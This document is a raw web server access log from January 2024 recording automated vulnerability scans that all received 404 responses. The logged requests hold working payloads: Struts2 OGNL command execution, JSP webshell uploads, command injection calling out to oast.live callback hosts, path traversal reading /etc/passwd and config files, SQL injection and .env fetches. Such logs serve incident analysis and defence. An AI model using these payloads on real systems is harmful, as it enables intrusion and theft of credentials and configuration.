137.220.197.141 - - [21/Jan/2024:02:38:40 +0100] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:42 +0100] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:44 +0100] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:46 +0100] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:48 +0100] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:56 +0100] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:39:46 +0100] "GET /webadmin/script?command=|%20nslookup%20cmm00rc3m87t5g88qsogc8isbe1tpep1g.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:39:50 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:39:54 +0100] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:39:56 +0100] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:39:58 +0100] "GET /webadmin/script?command=|%20nslookup%20cmm00rc3m87t5g88qsogdzrnsbzd39ke9.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:39:58 +0100] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:40:00 +0100] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:40:02 +0100] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:40:04 +0100] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:40:09 +0100] "GET /webadmin/script?command=|%20nslookup%20cmm00rc3m87t5g88qsogkopqo9eh91r5h.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:40:14 +0100] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:40:21 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:40:57 +0100] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:40:59 +0100] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:41:01 +0100] "POST /invoker/readonly HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:41:02 +0100] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:41:16 +0100] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:41:23 +0100] "PUT /poc.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:41:25 +0100] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:41:46 +0100] "PUT /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:41:48 +0100] "GET /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:41:52 +0100] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:42:03 +0100] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:42:04 +0100] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:42:04 +0100] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:42:07 +0100] "POST /invoker/readonly HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:42:17 +0100] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:42:21 +0100] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:42:31 +0100] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:42:34 +0100] "GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:42:36 +0100] "GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:43:17 +0100] "PUT /poc.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:43:19 +0100] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:43:29 +0100] "PUT /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:43:31 +0100] "GET /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:43:48 +0100] "GET /webadmin/script?command=|%20nslookup%20cmm00rc3m87t5g88qsogso311dp9brrjd.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:44:07 +0100] "PUT /poc.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:44:09 +0100] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:44:17 +0100] "PUT /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:44:19 +0100] "GET /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:44:22 +0100] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:44:31 +0100] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:44:35 +0100] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:44:42 +0100] "GET /webadmin/script?command=|%20nslookup%20cmm00rc3m87t5g88qsog8r78efr3kqjq9.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:44:42 +0100] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:45:08 +0100] "GET /webadmin/script?command=|%20nslookup%20cmm00rc3m87t5g88qsogdgwq1xwftbozi.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:45:37 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:46:04 +0100] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:47:01 +0100] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:47:10 +0100] "GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:47:12 +0100] "GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:47:27 +0100] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:47:37 +0100] "GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:47:39 +0100] "GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:48:25 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:48:43 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:49:24 +0100] "GET /webadmin/script?command=|%20nslookup%20cmm00rc3m87t5g88qsoganq8dqib9mau4.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:51:38 +0100] "GET /webadmin/script?command=|%20nslookup%20cmm00rc3m87t5g88qsogt33bqh5fkorrt.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:51:51 +0100] "GET /webadmin/script?command=|%20nslookup%20cmm00rc3m87t5g88qsogppsj9mmbnah8r.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:51:51 +0100] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:52:23 +0100] "PUT /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:52:25 +0100] "GET /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:53:02 +0100] "PUT /poc.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:53:04 +0100] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:53:44 +0100] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:53:46 +0100] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:53:48 +0100] "POST /invoker/readonly HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:54:06 +0100] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:54:20 +0100] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:56:41 +0100] "PUT /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:56:43 +0100] "GET /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:57:09 +0100] "PUT /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:57:11 +0100] "GET /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:57:40 +0100] "PUT /poc.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:57:42 +0100] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:58:08 +0100] "PUT /poc.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:58:10 +0100] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:59:11 +0100] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:00:01 +0100] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:00:03 +0100] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:00:05 +0100] "POST /invoker/readonly HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:00:41 +0100] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:00:41 +0100] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:00:43 +0100] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:00:45 +0100] "POST /invoker/readonly HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:00:52 +0100] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:01:04 +0100] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:04:19 +0100] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:04:21 +0100] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:05:08 +0100] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:05:31 +0100] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:06:04 +0100] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:06:15 +0100] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:06:29 +0100] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:06:47 +0100] "POST / HTTP/1.1" 404 952
65.49.1.38 - - [21/Jan/2024:03:08:03 +0100] "GET / HTTP/1.1" 404 952
65.49.1.38 - - [21/Jan/2024:03:08:22 +0100] "GET /favicon.ico HTTP/1.1" 404 952
65.49.1.51 - - [21/Jan/2024:03:08:38 +0100] "GET /?format=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:09:20 +0100] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:09:35 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:09:56 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:10:15 +0100] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:10:20 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:11:13 +0100] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:11:26 +0100] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:11:38 +0100] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:11:38 +0100] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:13:39 +0100] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1" 404 952
194.48.250.103 - - [21/Jan/2024:03:14:58 +0100] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:15:20 +0100] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:15:32 +0100] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:15:45 +0100] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:16:05 +0100] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:16:30 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:17:54 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:17:56 +0100] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:18:08 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:18:23 +0100] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:18:38 +0100] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:18:52 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:19:31 +0100] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:20:27 +0100] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:20:52 +0100] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:21:09 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:21:11 +0100] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:21:31 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:21:33 +0100] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:21:56 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:21:58 +0100] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:23:15 +0100] "GET /.env HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:24:38 +0100] "GET /.env HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:24:49 +0100] "GET /.env HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:25:01 +0100] "GET /.env HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:25:16 +0100] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:26:12 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:27:32 +0100] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:27:47 +0100] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:28:06 +0100] "GET /.env HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:28:52 +0100] "GET /.env HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:29:11 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:29:13 +0100] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:29:13 +0100] "GET /.env HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:29:34 +0100] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:30:09 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:30:35 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:31:01 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:31:03 +0100] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:31:10 +0100] "GET /CMSInstall/install.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:31:13 +0100] "GET /composer/send_email?to=NbtL@Vuow&url=http://cmm00rc3m87t5g88qsog78n17udgcya5j.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:31:14 +0100] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:31:26 +0100] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:31:39 +0100] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:31:50 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:31:52 +0100] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:32:35 +0100] "GET /CMSInstall/install.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:32:38 +0100] "GET /composer/send_email?to=wCIY@LVTN&url=http://cmm00rc3m87t5g88qsog6a5h7q1fb7si7.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:32:45 +0100] "GET /CMSInstall/install.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:32:48 +0100] "GET /composer/send_email?to=jSAr@XnRo&url=http://cmm00rc3m87t5g88qsog8eth5pmz4h95c.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:32:57 +0100] "GET /CMSInstall/install.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:32:58 +0100] "GET /.env HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:33:00 +0100] "GET /composer/send_email?to=fxyK@ViUV&url=http://cmm00rc3m87t5g88qsog3e75hwdmaozft.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:34:55 +0100] "GET /.env HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:03:35:08 +0100] "GET /.env HTTP/1.1" 404 952
